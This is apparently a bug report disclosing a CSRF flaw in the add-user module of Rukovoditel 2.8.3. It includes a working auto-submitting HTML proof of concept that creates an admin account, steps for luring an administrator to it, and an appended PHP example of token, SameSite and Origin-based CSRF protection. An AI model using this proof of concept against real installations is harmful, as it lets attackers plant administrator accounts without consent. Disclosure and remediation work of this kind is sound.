## Bug Description
Hi. I found a CSRF in the "add new user" module of Rukovoditel 2.8.3. A hacker can add a new user with admin privileges.
## How to Reproduce
Steps to reproduce the behavior:
1. Create a CSRF POC using the following code.
```html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Cross Site Request Forgery</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
// Submit every form on the page as soon as it loads
function fireForms()
{
var count = 2;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<H2>Cross Site Request Forgery</H2>
<!-- First request: the username/e-mail validation endpoint -->
<form method="POST" name="form1" action="http://localhost//rukovoditel_2.8.3/index.php?module=users/validate_form">
<input type="hidden" name="username" value="admin1"/>
<input type="hidden" name="useremail" value="admin1@admin.com"/>
</form>
<!-- Second request: the save action that creates the user -->
<form method="POST" name="form0" action="http://localhost//rukovoditel_2.8.3/index.php?module=items/&action=save">
<input type="hidden" name="path" value="1"/>
<input type="hidden" name="redirect_to" value=""/>
<input type="hidden" name="parent_item_id" value="0"/>
<input type="hidden" name="fields[5]" value="1"/>
<input type="hidden" name="fields[14]" value="default"/>
<input type="hidden" name="fields[6]" value="0"/>
<input type="hidden" name="fields[12]" value="admin1"/>
<input type="hidden" name="password" value="admin1pass"/>
<input type="hidden" name="fields[7]" value="admin1pass"/>
<input type="hidden" name="fields[8]" value="Name is Nothing"/>
<input type="hidden" name="fields[10]" value=""/>
<input type="hidden" name="fields[9]" value="admin1@admin.com"/>
<input type="hidden" name="fields[13]" value="english.php"/>
</form>
</body>
</html>
```
2. Replace the URI with the path to the Rukovoditel 2.8.3 folder and change the password field.
3. Send the link to the script to the victim (admin) to make them click it.
4. Log in with the new user.
## Server Information
Xampp on Windows 10
### PHP Operating System
Windows NT DESKTOP-BDPIT37 10.0 build 18363 (Windows 10) AMD64
### PHP Version
PHP Version 7.4.15
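As an added example that is not part of the original report and not Rukovoditel's own code, the following PHP shows how a state-changing form handler such as the add-user save action can be protected against this kind of forged request: a per-session synchronizer token that the handler verifies in constant time, a SameSite session cookie (available since PHP 7.3, so it applies to the PHP 7.4.15 reported above), and an Origin header check as a second layer. All function names, the field name `csrf_token` and the placeholder origin `https://example.invalid` are assumptions.

```php
<?php
// Added example (not Rukovoditel's code): CSRF protection for a
// state-changing form handler. Names and the expected origin are assumed.
declare(strict_types=1);

// Start the session with a SameSite=Lax cookie so the browser does not
// attach it to cross-site top-level POSTs like the ones in the PoC.
function start_session(): void
{
    if (session_status() === PHP_SESSION_ACTIVE) {
        return;
    }
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,   // assumes the app is served over HTTPS
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Issue (or reuse) a per-session token; call this when rendering the form.
function csrf_token(): string
{
    start_session();
    if (empty($_SESSION['csrf_token'])) {
        // 32 CSPRNG bytes, hex-encoded (64 characters)
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Validate a submitted token; true only on a constant-time match.
function csrf_check(?string $submitted): bool
{
    start_session();
    $expected = $_SESSION['csrf_token'] ?? '';
    if ($expected === '' || $submitted === null) {
        return false;
    }
    return hash_equals($expected, $submitted);
}

// Second layer: if the browser sent an Origin header, it must be ours.
// Requests without the header fall through to the token check alone.
function same_origin(string $expectedOrigin): bool
{
    $origin = $_SERVER['HTTP_ORIGIN'] ?? null;
    return $origin === null || $origin === $expectedOrigin;
}

// Hidden field to embed in the add-user form template.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Guard for a save handler (e.g. index.php?module=...&action=save).
// Returns true when the request may proceed to the existing
// validation and user-creation logic; otherwise sends 403 and returns false.
function csrf_guard(array $post, string $expectedOrigin): bool
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        http_response_code(405);
        return false;
    }
    if (!same_origin($expectedOrigin) || !csrf_check($post['csrf_token'] ?? null)) {
        http_response_code(403);
        echo 'Invalid or missing CSRF token';
        return false;
    }
    return true;
}

// Handler skeleton: nothing below the guard runs for a forged request.
if (php_sapi_name() !== 'cli' && csrf_guard($_POST, 'https://example.invalid')) {
    // ... existing user validation and creation code goes here ...
}
```

With `csrf_field()` rendered inside the legitimate add-user form, a page like the PoC above cannot obtain the token (it lives only in the victim's session and in a page the attacker's origin cannot read), so both forged POSTs are rejected with 403 before any user is created; the SameSite cookie additionally keeps the victim's session from being sent with those requests at all.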